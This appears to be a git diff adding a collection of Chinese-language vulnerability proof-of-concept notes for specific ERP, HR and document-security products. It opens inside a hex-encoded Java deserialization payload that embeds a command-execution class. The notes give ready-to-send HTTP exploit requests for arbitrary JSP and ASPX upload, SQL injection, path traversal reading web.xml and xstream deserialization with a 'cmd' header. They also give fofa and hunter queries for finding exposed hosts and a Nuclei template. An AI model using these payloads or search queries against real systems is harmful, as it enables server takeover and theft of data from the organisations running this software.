463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;"}}
+```
+
+![1701857281371-366d0fff-3993-468e-9fa4-46d927695599.png](./img/aQRss8sqMlqj0mF0/1701857281371-366d0fff-3993-468e-9fa4-46d927695599-377274.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/glgz0p4ynm6kfc1v>
\ No newline at end of file
diff --git a/云时空社会化商业ERP系统gpy任意文件上传漏洞.md b/云时空社会化商业ERP系统gpy任意文件上传漏洞.md
new file mode 100644
index 0000000..c7b98c8
--- /dev/null
+++ b/云时空社会化商业ERP系统gpy任意文件上传漏洞.md
@@ -0,0 +1,51 @@
+# 云时空社会化商业ERP系统gpy任意文件上传漏洞
+
+# 一、漏洞简介
+云时空社会化商业ERP以大型集团供应链系统为支撑，是基于互联网技术的多渠道模式营销服务管理体系，可以帮助您整合线上和线下交易模式，覆盖企业经营管理应用各个方面。云时空社会化商业ERP系统gpy接口存在任意文件上传漏洞，未经身份认证的攻击者可通过该漏洞在服务器端上传jsp文件获取服务器权限。
+
+# <font style="color:rgb(44, 62, 80);">二、影响版本</font>
++ 云时空社会化商业ERP
+
+# 三、资产测绘
++ hunter`web.body="/static/plugin/lhgdialog/skins/default.css"`
++ 特征
+
+![1702439672374-9b6516a4-c8a6-42cb-bf3b-f8a1c131cfac.png](./img/xZS8jyBZUVBke0PW/1702439672374-9b6516a4-c8a6-42cb-bf3b-f8a1c131cfac-190091.png)
+
+# 四、漏洞复现
+```plain
+POST /servlet/fileupload/gpy HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
+Content-Length: 221
+
+--4eea98d02AEa93f60ea08dE3C18A1388
+Content-Disposition: form-data; name="file1"; filename="stc.jsp"
+Content-Type: application/octet-stream
+
+<% out.println("123"); %>
+--4eea98d02AEa93f60ea08dE3C18A1388--
+```
+
+![1702439757315-188d99c7-9bec-4457-8fbd-56f8f6b42b23.png](./img/xZS8jyBZUVBke0PW/1702439757315-188d99c7-9bec-4457-8fbd-56f8f6b42b23-779513.png)
+
+上传文件位置
+
+2023-12-13，为响应时间
+
+```plain
+/uploads/pics/2023-12-13/stc.jsp
+```
+
+![1702439815849-f9b8b51c-ae4f-4253-82f5-779b0146cb6d.png](./img/xZS8jyBZUVBke0PW/1702439815849-f9b8b51c-ae4f-4253-82f5-779b0146cb6d-890051.png)
+
+
+
+> 更新: 2024-02-29 23:55:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gisby3trr2tide3u>
\ No newline at end of file
diff --git a/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md b/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md
new file mode 100644
index 0000000..7d7b21e
--- /dev/null
+++ b/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 云连POS-ERP管理系统ZksrService存在SQL注入漏洞
+
+云连POS-ERP管理系统ZksrService存在SQL注入漏洞
+
+## fofa
+```javascript
+title="Powered By chaosZ"
+```
+
+## poc
+```javascript
+POST /services/ZksrService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+SOAPAction: ""
+Content-Type: text/xml; charset=UTF-8
+Connection: close
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.service.chaosZ.com">
+<soapenv:Header/>
+    <soapenv:Body>
+        <web:getItemInfo soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+            <data xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">{"CargoOwner":"1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(78)+CHAR(109)+CHAR(100)+CHAR(82)+CHAR(69)+CHAR(83)+CHAR(118)+CHAR(67)+CHAR(88)+CHAR(109)+CHAR(100)+CHAR(97)+CHAR(105)+CHAR(115)+CHAR(65)+CHAR(107)+CHAR(117)+CHAR(84)+CHAR(74)+CHAR(100)+CHAR(114)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(119)+CHAR(88)+CHAR(65)+CHAR(108)+CHAR(117)+CHAR(110)+CHAR(109)+CHAR(118)+CHAR(106)+CHAR(65)+CHAR(77)+CHAR(68)+CHAR(112)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113),NULL-- qfYz"}
+            </data>
+        </web:getItemInfo>
+    </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![image-20241219151045261](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191510339.png)
\ No newline at end of file
diff --git a/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md b/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..804a7f0
--- /dev/null
+++ b/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# 云连POS-ERP管理系统downloadFile存在任意文件读取漏洞
+
+云连POS-ERP管理系统downloadFile存在任意文件读取漏洞
+
+## fofa
+```javascript
+title="Powered By chaosZ"
+```
+
+## poc
+```javascript
+POST /admin/file!download.action;admin!login.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+downloadFile=../../WEB-INF/web.xml
+```
+
+![image-20241219151235140](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191512200.png)
\ No newline at end of file
diff --git a/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md b/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md
new file mode 100644
index 0000000..d3401ee
--- /dev/null
+++ b/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 亿华人力资源管理系统filemanage存在任意文件上传漏洞
+
+# 一、漏洞简介
+亿华人力资源管理系统是一款全面的人力资源管理软件，旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面，包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统filemanage存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 亿华人力资源管理系统
+
+# 三、资产测绘
++ hunter`web.body="亿华人力资源管理系统"`
++ 特征
+
+![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/WTXbO54ISXKjDEmu/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-046567.png)
+
+# 四、漏洞复现
+```plain
+POST /filemanage/file/default.aspx HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------13611309432955470360700636523
+Content-Length: 1170
+Connection: close
+Cookie: ASP.NET_SessionId=2g3mplfduhthivdwifteza3q
+Upgrade-Insecure-Requests: 1
+
+-----------------------------13611309432955470360700636523
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+/wEPDwULLTEzNjk1NjQwNjYPZBYCAgMPZBYGAgEPDxYCHgRUZXh0BQ0vRmlsZXNVcGxvYWQvZGQCAw8PFgIeB1Zpc2libGVoZGQCBA8PFgIfAWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIQXV0b05hbWWy1sk+LR5PsSft3vRvaTFxMKfM4/Mdc2SRqdis5w3/ag==
+-----------------------------13611309432955470360700636523
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+5338F018
+-----------------------------13611309432955470360700636523
+Content-Disposition: form-data; name="fileToUpload"; filename="2.aspx"
+Content-Type: image/png
+
+123
+-----------------------------13611309432955470360700636523
+Content-Disposition: form-data; name="UploadBtn"
+
+上传文件
+-----------------------------13611309432955470360700636523
+```
+
+![1700989027405-0de5f0a6-b55e-4722-a428-fa3c48b6f79a.png](./img/WTXbO54ISXKjDEmu/1700989027405-0de5f0a6-b55e-4722-a428-fa3c48b6f79a-603997.png)
+
+上传文件位置
+
+```plain
+/FilesUpload/2.aspx
+```
+
+![1700989045882-fc17b807-e1fb-4552-9726-160375aba6ac.png](./img/WTXbO54ISXKjDEmu/1700989045882-fc17b807-e1fb-4552-9726-160375aba6ac-901354.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/elmyeuhlruvlkvox>
\ No newline at end of file
diff --git a/亿华人力资源管理系统filemanage存在目录遍历漏洞.md b/亿华人力资源管理系统filemanage存在目录遍历漏洞.md
new file mode 100644
index 0000000..7f8d420
--- /dev/null
+++ b/亿华人力资源管理系统filemanage存在目录遍历漏洞.md
@@ -0,0 +1,29 @@
+# 亿华人力资源管理系统filemanage存在目录遍历漏洞
+
+# 一、漏洞简介
+亿华人力资源管理系统是一款全面的人力资源管理软件，旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面，包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统filemanage存在目录遍历漏洞，可通过该漏洞查看网站源码及配置文件等敏感信息。
+
+# 二、影响版本
++ 亿华人力资源管理系统
+
+# 三、资产测绘
++ hunter`web.body="亿华人力资源管理系统"`
++ 特征
+
+![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/zcWQQp8jsVRLBX-8/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-732191.png)
+
+# 四、漏洞复现
+```plain
+/filemanage/file/default.aspx
+```
+
+![1700989447803-6daa1ad8-0c21-4a3e-bcff-8558bef4a3da.png](./img/zcWQQp8jsVRLBX-8/1700989447803-6daa1ad8-0c21-4a3e-bcff-8558bef4a3da-078709.png)
+
+在转到目录除输入`../`即可跳转到网站目录查看网站源码及各类配置文件
+
+![1700989498664-e661c4dc-8bd3-483b-a458-23c4c7cd667b.png](./img/zcWQQp8jsVRLBX-8/1700989498664-e661c4dc-8bd3-483b-a458-23c4c7cd667b-645753.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gnluyfnyo0do37cq>
\ No newline at end of file
diff --git a/亿华人力资源管理系统upfile存在任意文件上传漏洞.md b/亿华人力资源管理系统upfile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..2125b6d
--- /dev/null
+++ b/亿华人力资源管理系统upfile存在任意文件上传漏洞.md
@@ -0,0 +1,63 @@
+# 亿华人力资源管理系统upfile存在任意文件上传漏洞
+
+# 一、漏洞简介
+亿华人力资源管理系统是一款全面的人力资源管理软件，旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面，包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统upfile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 亿华人力资源管理系统
+
+# 三、资产测绘
++ hunter`web.body="亿华人力资源管理系统"`
++ 特征
+
+![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/iEv2oxqoEmhNMSu_/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-674856.png)
+
+# 四、漏洞复现
+```plain
+POST /FileManage/upfile.aspx HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3243433393122674734542415452
+Content-Length: 659
+Connection: close
+Cookie: ASP.NET_SessionId=2gs554ezsztrgmbwf1dffzls
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3243433393122674734542415452
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+/wEPDwUKMTEwMjM4NDkyMWRktbRwLggX8FeyROMxp865VQxNInwjdx6WjO4Wq+j8FUg=
+-----------------------------3243433393122674734542415452
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+BD080F3A
+-----------------------------3243433393122674734542415452
+Content-Disposition: form-data; name="File"; filename="1.aspx"
+Content-Type: image/png
+
+123
+-----------------------------3243433393122674734542415452
+Content-Disposition: form-data; name="UploadButton"
+
+开始上传
+-----------------------------3243433393122674734542415452--
+
+```
+
+![1700991001207-7dffd895-f687-4e82-bfa2-c117df04e750.png](./img/iEv2oxqoEmhNMSu_/1700991001207-7dffd895-f687-4e82-bfa2-c117df04e750-033334.png)
+
+上传文件位置
+
+```plain
+/FilesUpload/1.aspx
+```
+
+![1700991042096-6e61ec91-f9c2-4cc4-99f1-92b53c4a8f16.png](./img/iEv2oxqoEmhNMSu_/1700991042096-6e61ec91-f9c2-4cc4-99f1-92b53c4a8f16-289517.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xnk6usd7it2uhng6>
\ No newline at end of file
diff --git a/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md b/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md
new file mode 100644
index 0000000..e35251c
--- /dev/null
+++ b/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md
@@ -0,0 +1,30 @@
+# 亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660)
+
+亿赛通CDG电子文档安全管理系统，该漏洞源于文件/com/esafenet/servlet/policy/HookService.java的参数hookId会导致SQL注入。
+
+## fofa
+
+```javascript
+body="/CDGServer3/index.jsp"
+```
+
+## poc
+
+```javascript
+GET /CDGServer3/parameter/HookService;logindojojs?command=DelHookService&hookId=1';if(db_name()='CobraDGServer')+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Language: zh-Hans-CN;q=1
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061657549.png)
+
+
+
+## 漏洞来源
+
+- https://flowus.cn/share/9d33a5d8-87b1-482b-8642-a8fcf27585ba?code=G8A6P3
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md b/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md
new file mode 100644
index 0000000..f436a40
--- /dev/null
+++ b/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md
@@ -0,0 +1,68 @@
+## 亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞
+
+亿某通电子文档安全管理系统 UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+```
+body="/CDGServer3/index.jsp"
+```
+
+## poc
+```
+POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+ 
+id=1';WAITFOR DELAY '0:0:3'--
+```
+
+![8ce5da8fddd2d106e5eadb6e6c705f69](https://github.com/wy876/POC/assets/139549762/4fdf4a1c-f49a-47bc-9c1c-3d663b1d62e6)
+
+## Nuclei
+```
+id: CDG-UploadFileToCatalog-SQL
+
+info:
+  name:  由于某赛通电子文档安全管理系统 UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+  author: WLF
+  severity: high
+  metadata: 
+    fofa-query: body="/CDGServer3/index.jsp"
+variables:
+  filename: "{{to_lower(rand_base(10))}}"
+  boundary: "{{to_lower(rand_base(20))}}"
+http:
+  - raw:
+      - |
+        POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+        Upgrade-Insecure-Requests: 1
+        
+        id=1';WAITFOR DELAY '0:0:5'--
+
+
+
+      
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=4 && duration<=7'
+
+      - type: dsl
+        dsl:
+           - status_code == 200
+```
diff --git a/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..f62da5e
--- /dev/null
+++ b/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统AutoSignService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统AutoSignService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/tK-eUSHk6FfLxBID/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-136380.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/AutoSignService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
